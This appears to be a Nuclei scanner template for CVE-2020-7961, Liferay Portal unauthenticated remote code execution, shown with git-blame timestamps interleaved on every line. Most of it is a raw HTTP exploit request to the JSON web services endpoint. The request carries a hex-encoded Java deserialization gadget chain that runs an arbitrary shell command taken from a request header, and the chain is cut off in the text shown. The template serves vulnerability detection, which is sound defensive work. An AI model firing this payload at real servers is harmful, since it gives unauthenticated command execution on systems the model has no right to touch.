2021-01-02 04:56:15 +00:00
|
|
|
id: CVE-2020-7961
|
2020-07-03 17:54:34 +00:00
|
|
|
|
|
|
|
info:
|
2022-04-29 19:58:07 +00:00
|
|
|
name: Liferay Portal Unauthenticated < 7.2.1 CE GA2 - Remote Code Execution
|
2020-07-03 17:54:34 +00:00
|
|
|
author: dwisiswant0
|
2020-08-18 00:03:51 +00:00
|
|
|
severity: critical
|
2022-04-29 19:58:07 +00:00
|
|
|
description: Liferay Portal prior to 7.2.1 CE GA2 allows remote attackers to execute arbitrary code via JSON web services (JSONWS).
|
2023-09-06 12:22:36 +00:00
|
|
|
remediation: |
|
|
|
|
Upgrade Liferay Portal to version 7.2.1 CE GA2 or later to mitigate the vulnerability.
|
2021-08-18 11:37:49 +00:00
|
|
|
reference:
|
2021-09-09 06:16:54 +00:00
|
|
|
- https://www.synacktiv.com/en/publications/how-to-exploit-liferay-cve-2020-7961-quick-journey-to-poc.html
|
2021-08-19 14:44:46 +00:00
|
|
|
- https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html
|
|
|
|
- https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/id/117954271
|
2022-04-29 19:58:07 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-7961
|
2023-07-11 19:49:27 +00:00
|
|
|
- http://packetstormsecurity.com/files/157254/Liferay-Portal-Java-Unmarshalling-Remote-Code-Execution.html
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 9.8
|
2021-09-10 11:26:40 +00:00
|
|
|
cve-id: CVE-2020-7961
|
|
|
|
cwe-id: CWE-502
|
2023-10-14 11:27:55 +00:00
|
|
|
epss-score: 0.97443
|
|
|
|
epss-percentile: 0.99931
|
2023-09-06 12:22:36 +00:00
|
|
|
cpe: cpe:2.3:a:liferay:liferay_portal:*:*:*:*:community:*:*:*
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 2
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: liferay
|
|
|
|
product: liferay_portal
|
2023-07-12 11:56:50 +00:00
|
|
|
tags: packetstorm,cve,cve2020,rce,liferay,kev
|
2020-07-03 17:54:34 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-08-22 18:09:33 +00:00
|
|
|
- raw:
|
2020-08-18 00:03:51 +00:00
|
|
|
- |
|
|
|
|
POST /api/jsonws/invoke HTTP/1.1
|
2021-01-10 22:39:54 +00:00
|
|
|
Host: {{Hostname}}
|
2020-08-18 00:03:51 +00:00
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
Referer: {{BaseURL}}/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData
|
2022-04-29 05:04:34 +00:00
|
|
|
cmd2: {{command}}
|
2020-08-18 00:03:51 +00:00
|
|
|
|
2023-07-20 07:43:09 +00:00
|
|
|
cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth={{to_lower(rand_text_alpha(5))}}&formDate=1597704739243&tableId=1&name=A&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200206A617661782E7363726970742E536372697074456E67696E654D616E61676572000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000074000B6E6577496E7374616E6365757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007371007E00137571007E00180000000174000A4A61766153637269707474000F676574456E67696E6542794E616D657571007E001B00000001767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707371007E0013757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017404567661722063757272656E74546872656164203D20636F6D2E6C6966657261792E706F7274616C2E736572766963652E53657276696365436F6E746578745468726561644C6F63616C2E67657453657276696365436F6E7465787428293B0A76617220697357696E203D206A6176612E6C616E672E53797374656D2E67657450726F706572747928226F732E6E616D6522292E746F4C6F7765724361736528292E636F6E7461696E73282277696E22293B0A7661722072657175657374203D2063757272656E745468726561642E6765745265717565737428293B0A766172205F726571203D206F72672E6170616368652E636174616C696E612E636F6E6E6563746F722E526571756573744661636164652E636C6173732E6765744465636C617265644669656C6428227265717565737422293B0A5F7265712E73657441636365737369626C652874727565293B0A766172207265616C52657175657374203D205F7265712E6765742872657175657374293B0A76617220726573706F6E7365203D207265616C526571756573742E676574526573706F6E736528293B0A766172206F757470757453747265616D203D20726573706F6E73652E6765744F757470757453747265616D28293B0A76617220636D64203D206E6577206A6176612E6C616E672E537472696E6728726571756573742E6765744865616465722822636D64322229293B0A766172206C697374436D64203D206E6577206A6176612E7574696C2E41727261794C69737428293B0A7661722070203D206E6577206A6176612E6C616E672E50726F636573734275696C64657228293B0A696628697357696E297B0A20202020702E636F6D6D616E642822636D642E657865222C20222F63222C20636D64293B0A7D656C73657B0A20202020702E636F6D6D616E64282262617368222C20222D63222C20636D64293B0A7D0A702E72656469726563744572726F7253747265616D2874727565293B0A7661722070726F63657373203D20702E737461727428293B0A76617220696E70757453747265616D526561646572203D206E6577206A6176612E696F2E496E70757453747265616D5265616465722870726F636573732E676574496E70757453747265616D2829293B0A766172206275666665726564526561646572203D206E6577206A6176612E696F2E42
|
2021-03-18 19:05:13 +00:00
|
|
|
|
2021-08-22 18:09:33 +00:00
|
|
|
payloads:
|
|
|
|
command:
|
2023-07-11 19:49:27 +00:00
|
|
|
- "systeminfo" # Windows
|
|
|
|
- "lsb_release -a" # Linux
|
2021-08-22 18:09:33 +00:00
|
|
|
|
2020-08-18 00:03:51 +00:00
|
|
|
matchers-condition: and
|
2020-07-03 17:54:34 +00:00
|
|
|
matchers:
|
2020-10-15 19:58:54 +00:00
|
|
|
- type: regex
|
|
|
|
regex:
|
|
|
|
- "OS Name:.*Microsoft Windows"
|
|
|
|
- "Distributor ID:"
|
2023-07-11 19:49:27 +00:00
|
|
|
condition: or
|
2021-09-08 12:17:19 +00:00
|
|
|
|
2020-08-18 00:03:51 +00:00
|
|
|
- type: status
|
|
|
|
status:
|
2020-08-18 00:20:02 +00:00
|
|
|
- 200
|
2021-05-05 11:43:51 +00:00
|
|
|
|
2020-08-18 00:20:02 +00:00
|
|
|
extractors:
|
|
|
|
- type: regex
|
|
|
|
regex:
|
|
|
|
- "Microsoft Windows (.*)"
|
2021-09-09 06:16:54 +00:00
|
|
|
- "Distributor ID: (.*)"
|
2023-07-11 19:49:27 +00:00
|
|
|
part: body
|